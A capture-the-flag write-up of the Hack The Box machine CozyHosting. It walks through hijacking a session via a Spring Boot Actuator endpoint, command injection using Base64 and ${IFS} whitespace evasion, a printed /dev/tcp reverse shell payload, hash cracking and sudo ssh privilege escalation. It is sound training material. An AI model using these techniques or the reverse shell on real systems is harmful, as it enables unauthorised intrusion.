search

CozyHosting

Platform: Hack The Box

Category/Tags: Linux, Command Injection, Misconfiguration

Difficulty: Easy

hashtag
Recon

To start the lab, just connect to the VPN provided by HTB and add the machine’s IP address to /etc/hosts.

As usual, I do an nmap scan.

nmap results

  • Open ports

    • Port 80 - http

    • Port 22 - ssh

This is the landing page for hosting solutions. There is also a login page, I tried some default and common credentials and some basic SQL injections. But no luck.

landing page
login page

I did some directory fuzzing using ffuf, some of the paths have status codes of 401 (unauthorized), 204 (no content), and 500 (internal server error). So, I use an alternative tool like dirsearch.

Among the results, the Spring Boot Actuator endpoints caught my attention, especially the /sessions

circle-info

Actuator endpoints let you monitor and interact with your application. Spring Boot includes a number of built-in endpoints and lets you add your own. For example, the health endpoint provides basic application health information. From Spring Documentationarrow-up-right.

actuator endpoints

I visit the http://<MACHINE_IP>/actuator/sessions . It shows me a token of user kanderson that can be used for logging in.

auth token

Go to Inspect > Storage > Cookies and change the value of JSESSIONID using the token (random strings) we saw earlier. Gotcha, we have access to the dashboard as K. Anderson.

admin dashboard

hashtag
Foothold

I explored the dashboard, but all of the components are not working aside from connection settings, where we can input some hostname and username. So I guess this is connecting to some SSH remote server. I tried some of the hostname and username SSH credentials, but I keep getting this error,

ssh connection error

So, I tried to inject Linux commands to see how the web app reacted to the input. I opened BurpSuite, intercepted the request for SSH connection functionality, and played some commands. Luckily,it is vulnerable to command injection.

circle-info

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation. From OWASParrow-up-right.

burpsuite request and response

We can now get the shell. To set up a listener,

But I ran into problems. If I supply a command that has spaces, I will get the error Username can't contain whitespaces!

burpsuite response

After some time of research, We need to encode the payload to Base64 and ${IFS} to escape whitespaces.

circle-info

Internal Field Separator (IFS), determines how Bash recognizes word boundaries while splitting a sequence of character strings. The default value of IFS is a three-character string comprising a space, tab, and newline. From Baeldung Linuxarrow-up-right.

Now, this is the crafted payload to be supplied in the username parameter. The Base64 encoded string is the encoded version of reverse shell payload sh -i >& /dev/tcp/<YOUR_IP>/1234 0>&1 . It will decode it using Base64 and then spit it out as a bash command.

Here it is, we got the shell. And this is the user named app.

app shell

And, user named app is not our low-privileged user.

/home

In the current directory, I found a jar file. I sent this to my local machine to decompile.

And then I download the jar file to my local machine and open it in Java Decompiler. Another thing that caught my attention is the PostgreSQL credentials under classes/application.properties.

application.properties

I tried to connect to the cozyhosting database using psql command,

I got the password for admin, and I think it was encoded using bcrypt.

users table

So, as usual, I decrypt this using John.

Gotcha! We have the password for admin.

john the ripper

I used the password for user admin, and it is not working, so I guess this is the password for user Josh.

We got the user shell!

user shell

hashtag
Privilege Escalation

The privilege escalation on this machine is the easiest part.

I use this command because I want to know if Josh granted permissions with the use of the sudo command.

Based on the output, Josh can run the ssh command with root privileges.

sudo -l

So, I headed to GTFOBinsarrow-up-right to find commands for ssh to get root privilege. This command may elevate or maintain privileged access if the user allows to run sudo in the ssh command.

Luckily, I got the root shell.

root shell

hashtag
Mitigation

  • Sanitize the user input to prevent command injection

  • Don’t give root permissions to low-privileged users

PreviousPerfectionNext0xBOverchunked: SQL Injection

Last updated